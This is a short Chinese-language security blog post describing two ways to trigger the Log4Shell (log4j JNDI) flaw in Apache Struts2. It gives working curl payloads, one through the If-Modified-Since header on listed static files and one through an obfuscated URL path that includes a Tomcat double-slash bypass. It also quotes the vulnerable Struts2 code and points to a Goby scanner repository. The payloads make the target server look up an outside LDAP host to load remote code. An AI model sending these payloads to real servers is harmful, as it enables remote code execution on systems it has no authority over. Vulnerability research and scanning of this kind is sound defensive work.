前言
随着log4j漏洞的出现,众多框架受到影响,大家都在研究不同框架的利用点在何处,下面总结的是Struts2目前的可利用点。
一、第一个利用点poc
curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js
代码分析
Struts2 framework 存在一些各种UI组件的静态文件,管理这些的是DefaultStaticContentLoader类,以下为漏洞触发点代码:
protected void process(InputStream is, String path, HttpServletRequest request, HttpServletResponse response) throws IOException {
if (is != null) {
Calendar cal = Calendar.getInstance();
// check for if-modified-since, prior to any other headers
long ifModifiedSince = 0;
try {
ifModifiedSince = request.getDateHeader("If-Modified-Since");
} catch (Exception e) {
LOG.warn("Invalid If-Modified-Since header value: '{}', ignoring", request.getHeader("If-Modified-Since"));
}
可以发现我们通过设置If-Modified-Since即可利用log4j漏洞,目前可利用的静态文件:
- tooltip.gif
- domtt.css
- utils.js
- domTT.js
- inputtransfersselect.js
- optiontransferselect.js
二、第二个利用点poc
curl -vv http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
代码分析
代码触发点在DefaultActionMapper类文件,这个类尝试解析URI后调用对应的action。
protected String cleanupNamespaceName(final String rawNamespace) {
if (allowedNamespaceNames.matcher(rawNamespace).matches()) {
return rawNamespace;
} else {
LOG.warn(
"{} did not match allowed namespace names {} - default namespace {} will be used!",
rawNamespace, allowedNamespaceNames, defaultNamespaceName
);
return defaultNamespaceName;
}
}
但是还有一个问题就是tomcat会将//识别为/,这里就需要将payload进行转变,最后可以使用
$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
Github
我将上面的利用点编写了goby的扫描脚本,同时有大量最新安全漏洞poc,欢迎大家一起交流。
地址在:https://github.com/aetkrad/goby_poc